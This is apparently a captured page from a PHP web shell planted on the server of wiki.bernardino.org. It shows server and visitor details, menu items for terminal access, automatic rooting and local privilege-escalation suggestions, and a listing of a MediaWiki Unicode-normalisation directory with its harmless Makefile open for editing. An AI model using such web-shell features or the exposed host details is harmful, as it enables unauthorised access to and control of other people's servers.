Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
wiki.bernardino.org /
includes /
normal /
Delete
Unzip
Name
Size
Permission
Date
Action
Makefile
3.05
KB
-rw-r--r--
2011-05-25 17:59
README
2.33
KB
-rw-r--r--
2007-01-13 03:15
RandomTest.php
2.98
KB
-rw-r--r--
2010-08-15 09:47
Utf8Case.php
33.26
KB
-rw-r--r--
2011-01-09 13:04
Utf8CaseGenerate.php
3.01
KB
-rw-r--r--
2011-05-15 15:36
Utf8Test.php
3.94
KB
-rw-r--r--
2011-05-15 15:36
UtfNormal.php
22.87
KB
-rw-r--r--
2011-05-15 15:36
UtfNormalBench.php
2.86
KB
-rw-r--r--
2011-05-15 15:36
UtfNormalData.inc
110.96
KB
-rw-r--r--
2011-03-27 14:21
UtfNormalDataK.inc
111.12
KB
-rw-r--r--
2011-03-27 14:21
UtfNormalDefines.php
2.67
KB
-rw-r--r--
2011-04-04 14:59
UtfNormalGenerate.php
6.5
KB
-rw-r--r--
2011-05-15 15:36
UtfNormalMemStress.php
3.04
KB
-rw-r--r--
2011-05-15 15:36
UtfNormalTest.php
8.1
KB
-rw-r--r--
2011-05-15 15:36
UtfNormalTest2.php
6.95
KB
-rw-r--r--
2011-06-17 18:05
UtfNormalUtil.php
3.61
KB
-rw-r--r--
2011-05-15 15:36
Save
Rename
.PHONY : all test testutf8 testclean icutest bench icubench clean distclean ## Latest greatest version of Unicode ## May cause confusion if running test suite from these files ## when the data was generated from a previous version. #BASE=http://www.unicode.org/Public/UNIDATA # Explicitly using Unicode 6.0 BASE=http://www.unicode.org/Public/6.0.0/ucd # Can override to php-cli or php5 or whatevah PHP=php #PHP=php-cli # Some nice tool to grab URLs with FETCH=wget #FETCH=fetch all : UtfNormalData.inc Utf8Case.php UtfNormalData.inc : UtfNormalGenerate.php UtfNormalUtil.php UnicodeData.txt CompositionExclusions.txt NormalizationCorrections.txt DerivedNormalizationProps.txt $(PHP) UtfNormalGenerate.php Utf8Case.php : Utf8CaseGenerate.php UtfNormalUtil.php UnicodeData.txt $(PHP) Utf8CaseGenerate.php test : testutf8 UtfNormalTest.php UtfNormalData.inc NormalizationTest.txt $(PHP) UtfNormalTest.php testutf8 : Utf8Test.php UTF-8-test.txt $(PHP) Utf8Test.php bench : UtfNormalData.inc testdata/washington.txt testdata/berlin.txt testdata/tokyo.txt testdata/young.txt testdata/bulgakov.txt $(PHP) UtfNormalBench.php icutest : UtfNormalData.inc NormalizationTest.txt $(PHP) Utf8Test.php --icu $(PHP) UtfNormalTest.php --icu icubench : UtfNormalData.inc testdata/washington.txt testdata/berlin.txt testdata/tokyo.txt testdata/young.txt testdata/bulgakov.txt $(PHP) UtfNormalBench.php --icu clean : rm -f UtfNormalData.inc UtfNormalDataK.inc distclean : clean rm -f CompositionExclusions.txt NormalizationTest.txt NormalizationCorrections.txt UnicodeData.txt DerivedNormalizationProps.txt UTF-8-test.txt # The Unicode data files... CompositionExclusions.txt : $(FETCH) $(BASE)/CompositionExclusions.txt NormalizationTest.txt : $(FETCH) $(BASE)/NormalizationTest.txt NormalizationCorrections.txt : $(FETCH) $(BASE)/NormalizationCorrections.txt DerivedNormalizationProps.txt : $(FETCH) $(BASE)/DerivedNormalizationProps.txt UnicodeData.txt : $(FETCH) $(BASE)/UnicodeData.txt UTF-8-test.txt : $(FETCH) http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt testdata/berlin.txt : mkdir -p testdata && wget -U MediaWiki/test -O testdata/berlin.txt "http://de.wikipedia.org/w/index.php?title=Berlin&oldid=2775712&action=raw" testdata/washington.txt : mkdir -p testdata && wget -U MediaWiki/test -O testdata/washington.txt "http://en.wikipedia.org/w/index.php?title=Washington%2C_D.C.&oldid=6370218&action=raw" testdata/tokyo.txt : mkdir -p testdata && wget -U MediaWiki/test -O testdata/tokyo.txt "http://ja.wikipedia.org/w/index.php?title=%E6%9D%B1%E4%BA%AC%E9%83%BD&oldid=940880&action=raw" testdata/young.txt : mkdir -p testdata && wget -U MediaWiki/test -O testdata/young.txt "http://ko.wikipedia.org/w/index.php?title=%EC%9D%B4%EC%88%98%EC%98%81&oldid=627688&action=raw" testdata/bulgakov.txt : mkdir -p testdata && wget -U MediaWiki/test -O testdata/bulgakov.txt "http://ru.wikipedia.org/w/index.php?title=%D0%91%D1%83%D0%BB%D0%B3%D0%B0%D0%BA%D0%BE%D0%B2%2C_%D0%A1%D0%B5%D1%80%D0%B3%D0%B5%D0%B9_%D0%9D%D0%B8%D0%BA%D0%BE%D0%BB%D0%B0%D0%B5%D0%B2%D0%B8%D1%87&oldid=17704&action=raw"